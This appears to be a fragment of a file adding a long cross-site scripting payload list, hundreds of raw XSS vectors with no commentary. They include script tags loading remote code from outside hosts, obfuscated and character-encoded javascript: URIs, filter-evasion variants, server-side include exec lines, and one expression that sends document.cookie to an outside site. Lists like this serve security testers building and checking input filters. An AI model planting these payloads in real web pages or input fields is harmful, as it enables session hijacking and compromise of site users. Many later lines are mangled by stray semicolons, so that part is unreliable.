\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
|
|
2183
|
+
</body>
|
|
2184
|
+
</html>
|
|
2185
|
+
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
|
|
2186
|
+
<SCRIPT> alert(“XSS”); </SCRIPT>
|
|
2187
|
+
<BODY ONLOAD=alert("XSS")>
|
|
2188
|
+
<BODY BACKGROUND="javascript:alert('XSS')">
|
|
2189
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
2190
|
+
<IMG DYNSRC="javascript:alert('XSS')">
|
|
2191
|
+
<IMG LOWSRC="javascript:alert('XSS')">
|
|
2192
|
+
<IFRAME SRC=”http://hacker-site.com/xss.html”>
|
|
2193
|
+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
2194
|
+
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
|
2195
|
+
<TABLE BACKGROUND="javascript:alert('XSS')">
|
|
2196
|
+
<TD BACKGROUND="javascript:alert('XSS')">
|
|
2197
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
2198
|
+
<DIV STYLE="width: expression(alert('XSS'));">
|
|
2199
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
|
|
2200
|
+
<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
|
|
2201
|
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
2202
|
+
'';!--"<XSS>=&{()}
|
|
2203
|
+
<SCRIPT>alert('XSS')</SCRIPT>
|
|
2204
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
2205
|
+
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
2206
|
+
<BASE HREF="javascript:alert('XSS');//">
|
|
2207
|
+
<BGSOUND SRC="javascript:alert('XSS');">
|
|
2208
|
+
<BODY BACKGROUND="javascript:alert('XSS');">
|
|
2209
|
+
<BODY ONLOAD=alert('XSS')>
|
|
2210
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
2211
|
+
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
|
|
2212
|
+
<DIV STYLE="width: expression(alert('XSS'));">
|
|
2213
|
+
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|
2214
|
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
2215
|
+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
2216
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
2217
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
2218
|
+
<IMG DYNSRC="javascript:alert('XSS');">
|
|
2219
|
+
<IMG LOWSRC="javascript:alert('XSS');">
|
|
2220
|
+
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
|
2221
|
+
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
|
2222
|
+
exp/*<XSS STYLE='no\xss:noxss("*//*");
|
|
2223
|
+
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
|
2224
|
+
<IMG SRC='vbscript:msgbox("XSS")'>
|
|
2225
|
+
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
|
2226
|
+
<IMG SRC="livescript:[code]">
|
|
2227
|
+
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
|
2228
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|
2229
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|
2230
|
+
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|
2231
|
+
<IMG SRC="mocha:[code]">
|
|
2232
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
|
2233
|
+
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
|
2234
|
+
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
|
2235
|
+
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);
|
|
2236
|
+
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|
2237
|
+
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
2238
|
+
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
2239
|
+
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
|
2240
|
+
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
2241
|
+
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
|
2242
|
+
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
|
2243
|
+
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
|
2244
|
+
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
|
2245
|
+
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
|
2246
|
+
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
|
|
2247
|
+
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
|
|
2248
|
+
<HTML xmlns:xss>
|
|
2249
|
+
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
|
2250
|
+
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
|
|
2251
|
+
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
|
|
2252
|
+
<HTML><BODY>
|
|
2253
|
+
<!--[if gte IE 4]>
|
|
2254
|
+
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
|
2255
|
+
<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
|
|
2256
|
+
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
|
2257
|
+
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
|
2258
|
+
<? echo('<SCR)';
|
|
2259
|
+
<BR SIZE="&{alert('XSS')}">
|
|
2260
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
2261
|
+
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
|
|
2262
|
+
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
|
2263
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
2264
|
+
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
|
|
2265
|
+
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
|
|
2266
|
+
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|
2267
|
+
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
|
|
2268
|
+
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
|
2269
|
+
\";alert('XSS');//
|
|
2270
|
+
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
|
2271
|
+
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
|
2272
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
|
2273
|
+
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
|
2274
|
+
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
|
2275
|
+
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
|
2276
|
+
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
|
|
2277
|
+
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
|
|
2278
|
+
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
|
|
2279
|
+
<IMG SRC=" &#14; javascript:alert('XSS');">
|
|
2280
|
+
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
2281
|
+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
2282
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js
|
|
2283
|
+
<SCRIPT SRC=//ha.ckers.org/.j>
|
|
2284
|
+
<IMG SRC="javascript:alert('XSS')"
|
|
2285
|
+
<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
|
|
2286
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
2287
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
2288
|
+
<SCRIPT>a=/XSS/
|
|
2289
|
+
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
2290
|
+
<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
2291
|
+
<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
2292
|
+
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
2293
|
+
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
2294
|
+
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
2295
|
+
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
2296
|
+
<A HREF="http://66.102.7.147/">XSS</A>
|
|
2297
|
+
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
|
|
2298
|
+
<A HREF="http://1113982867/">XSS</A>
|
|
2299
|
+
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
|
|
2300
|
+
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
|
|
2301
|
+
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>
|
|
2302
|
+
<A HREF="//www.google.com/">XSS</A>
|
|
2303
|
+
<A HREF="//google">XSS</A>
|
|
2304
|
+
<A HREF="http://ha.ckers.org@google">XSS</A>
|
|
2305
|
+
<A HREF="http://google:ha.ckers.org">XSS</A>
|
|
2306
|
+
<A HREF="http://google.com/">XSS</A>
|
|
2307
|
+
<A HREF="http://www.google.com./">XSS</A>
|
|
2308
|
+
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
|
2309
|
+
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
|
|
2310
|
+
<script>document.vulnerable=true;</script>
|
|
2311
|
+
<img SRC="jav ascript:document.vulnerable=true;">
|
|
2312
|
+
<img SRC="javascript:document.vulnerable=true;">
|
|
2313
|
+
<img SRC="  javascript:document.vulnerable=true;">
|
|
2314
|
+
<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
|
|
2315
|
+
<<SCRIPT>document.vulnerable=true;//<</SCRIPT>
|
|
2316
|
+
<script <B>document.vulnerable=true;</script>
|
|
2317
|
+
<img SRC="javascript:document.vulnerable=true;"
|
|
2318
|
+
<iframe src="javascript:document.vulnerable=true; <
|
|
2319
|
+
<script>a=/XSS/\ndocument.vulnerable=true;</script>
|
|
2320
|
+
\";document.vulnerable=true;;//
|
|
2321
|
+
</title><SCRIPT>document.vulnerable=true;</script>
|
|
2322
|
+
<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
|
|
2323
|
+
<body BACKGROUND="javascript:document.vulnerable=true;">
|
|
2324
|
+
<body ONLOAD=document.vulnerable=true;>
|
|
2325
|
+
<img DYNSRC="javascript:document.vulnerable=true;">
|
|
2326
|
+
<img LOWSRC="javascript:document.vulnerable=true;">
|
|
2327
|
+
<bgsound SRC="javascript:document.vulnerable=true;">
|
|
2328
|
+
<br SIZE="&{document.vulnerable=true}">
|
|
2329
|
+
<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
|
|
2330
|
+
<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
|
|
2331
|
+
<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
|
|
2332
|
+
<img SRC='vbscript:document.vulnerable=true;'>
|
|
2333
|
+
1script3document.vulnerable=true;1/script3
|
|
2334
|
+
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
|
|
2335
|
+
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
|
|
2336
|
+
<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
|
|
2337
|
+
<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
|
|
2338
|
+
<table BACKGROUND="javascript:document.vulnerable=true;">
|
|
2339
|
+
<table><TD BACKGROUND="javascript:document.vulnerable=true;">
|
|
2340
|
+
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
|
|
2341
|
+
<div STYLE="background-image: url(javascript:document.vulnerable=true;)">
|
|
2342
|
+
<div STYLE="width: expression(document.vulnerable=true);">
|
|
2343
|
+
<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
|
|
2344
|
+
<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
|
|
2345
|
+
<XSS STYLE="xss:expression(document.vulnerable=true)">
|
|
2346
|
+
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
|
|
2347
|
+
<style TYPE="text/javascript">document.vulnerable=true;</style>
|
|
2348
|
+
<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
|
|
2349
|
+
<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
|
|
2350
|
+
<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
|
|
2351
|
+
<base HREF="javascript:document.vulnerable=true;//">
|
|
2352
|
+
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
|
|
2353
|
+
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
|
|
2354
|
+
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
|
|
2355
|
+
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
|
|
2356
|
+
<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
|
|
2357
|
+
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
|
|
2358
|
+
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-
|
|
2359
|
+
<a href="javascript#document.vulnerable=true;">
|
|
2360
|
+
<div onmouseover="document.vulnerable=true;">
|
|
2361
|
+
<img src="javascript:document.vulnerable=true;">
|
|
2362
|
+
<img dynsrc="javascript:document.vulnerable=true;">
|
|
2363
|
+
<input type="image" dynsrc="javascript:document.vulnerable=true;">
|
|
2364
|
+
<bgsound src="javascript:document.vulnerable=true;">
|
|
2365
|
+
&<script>document.vulnerable=true;</script>
|
|
2366
|
+
&{document.vulnerable=true;};
|
|
2367
|
+
<img src=&{document.vulnerable=true;};>
|
|
2368
|
+
<link rel="stylesheet" href="javascript:document.vulnerable=true;">
|
|
2369
|
+
<iframe src="vbscript:document.vulnerable=true;">
|
|
2370
|
+
<img src="mocha:document.vulnerable=true;">
|
|
2371
|
+
<img src="livescript:document.vulnerable=true;">
|
|
2372
|
+
<a href="about:<script>document.vulnerable=true;</script>">
|
|
2373
|
+
<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">
|
|
2374
|
+
<body onload="document.vulnerable=true;">
|
|
2375
|
+
<div style="background-image: url(javascript:document.vulnerable=true;);">
|
|
2376
|
+
<div style="behaviour: url([link to code]);">
|
|
2377
|
+
<div style="binding: url([link to code]);">
|
|
2378
|
+
<div style="width: expression(document.vulnerable=true;);">
|
|
2379
|
+
<style type="text/javascript">document.vulnerable=true;</style>
|
|
2380
|
+
<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">
|
|
2381
|
+
<style><!--</style><script>document.vulnerable=true;//--></script>
|
|
2382
|
+
<<script>document.vulnerable=true;</script>
|
|
2383
|
+
<![<!--]]<script>document.vulnerable=true;//--></script>
|
|
2384
|
+
<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->
|
|
2385
|
+
<img src="blah"onmouseover="document.vulnerable=true;">
|
|
2386
|
+
<img src="blah>" onmouseover="document.vulnerable=true;">
|
|
2387
|
+
<xml src="javascript:document.vulnerable=true;">
|
|
2388
|
+
<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>
|
|
2389
|
+
<div datafld="b" dataformatas="html" datasrc="#X"></div>
|
|
2390
|
+
[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
|
|
2391
|
+
<style>@import'http://www.securitycompass.com/xss.css';</style>
|
|
2392
|
+
<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">
|
|
2393
|
+
<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>
|
|
2394
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>
|
|
2395
|
+
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>
|
|
2396
|
+
<script SRC="http://www.securitycompass.com/xss.jpg"></script>
|
|
2397
|
+
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->
|
|
2398
|
+
<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2399
|
+
<script =">" SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2400
|
+
<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2401
|
+
<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2402
|
+
<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2403
|
+
<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2404
|
+
<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>
|
|
2405
|
+
<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]
|
|
2406
|
+
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
2407
|
+
</script><script>alert(1)</script>
|
|
2408
|
+
</br style=a:expression(alert())>
|
|
2409
|
+
<scrscriptipt>alert(1)</scrscriptipt>
|
|
2410
|
+
<br size=\"&{alert('XSS')}\">
|
|
2411
|
+
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
|
|
2412
|
+
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
|
|
2413
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2414
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
|
|
2415
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2416
|
+
<~/XSS STYLE=xss:expression(alert('XSS'))>
|
|
2417
|
+
"><script>alert('XSS')</script>
|
|
2418
|
+
</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2419
|
+
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2420
|
+
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
2421
|
+
</XSS STYLE=xss:expression(alert('XSS'))>
|
|
2422
|
+
';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
|
|
2423
|
+
';';;!--";<;XSS>;=&;{()}
|
|
2424
|
+
<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
|
|
2425
|
+
<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
|
|
2426
|
+
<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
|
|
2427
|
+
<;BASE HREF=";javascript:alert(';XSS';);//";>;
|
|
2428
|
+
<;BGSOUND SRC=";javascript:alert(';XSS';);";>;
|
|
2429
|
+
<;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
|
|
2430
|
+
<;BODY ONLOAD=alert(';XSS';)>;
|
|
2431
|
+
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
|
|
2432
|
+
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
|
|
2433
|
+
<;DIV STYLE=";width: expression(alert(';XSS';));";>;
|
|
2434
|
+
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
|
|
2435
|
+
<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
|
|
2436
|
+
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
|
|
2437
|
+
<;IMG SRC=";javascript:alert(';XSS';);";>;
|
|
2438
|
+
<;IMG SRC=javascript:alert(';XSS';)>;
|
|
2439
|
+
<;IMG DYNSRC=";javascript:alert(';XSS';);";>;
|
|
2440
|
+
<;IMG LOWSRC=";javascript:alert(';XSS';);";>;
|
|
2441
|
+
<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
|
|
2442
|
+
Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
|
|
2443
|
+
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
|
|
2444
|
+
<;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS
|
|
2445
|
+
<;IMG SRC=';vbscript:msgbox(";XSS";)';>;
|
|
2446
|
+
<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
|
|
2447
|
+
<;IMG SRC=";livescript:[code]";>;
|
|
2448
|
+
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
|
|
2449
|
+
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
|
|
2450
|
+
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
|
|
2451
|
+
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;
|
|
2452
|
+
<;IMG SRC=";mocha:[code]";>;
|
|
2453
|
+
<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
|
|
2454
|
+
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
|
|
2455
|
+
<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
|
|
2456
|
+
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";; eval(a+b+c+d);
|
|
2457
|
+
<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
|
|
2458
|
+
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
|
|
2459
|
+
<;XSS STYLE=";xss:expression(alert(';XSS';))";>;
|
|
2460
|
+
<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
|
|
2461
|
+
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;
|
|
2462
|
+
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
|
|
2463
|
+
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
|
|
2464
|
+
<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
|
|
2465
|
+
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;
|
|
2466
|
+
<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
|
|
2467
|
+
<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
|
|
2468
|
+
<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
|
|
2469
|
+
<;HTML xmlns:xss>;
|
|
2470
|
+
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;
|
|
2471
|
+
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
|
|
2472
|
+
<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
|
|
2473
|
+
<;HTML>;<;BODY>;
|
|
2474
|
+
<;!--[if gte IE 4]>;
|
|
2475
|
+
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
|
|
2476
|
+
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
|
|
2477
|
+
<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
|
|
2478
|
+
<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
|
|
2479
|
+
<;? echo(';<;SCR)';;
|
|
2480
|
+
<;BR SIZE=";&;{alert(';XSS';)}";>;
|
|
2481
|
+
<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
|
|
2482
|
+
<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
|
|
2483
|
+
<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
|
|
2484
|
+
<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
|
|
2485
|
+
<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
|
|
2486
|
+
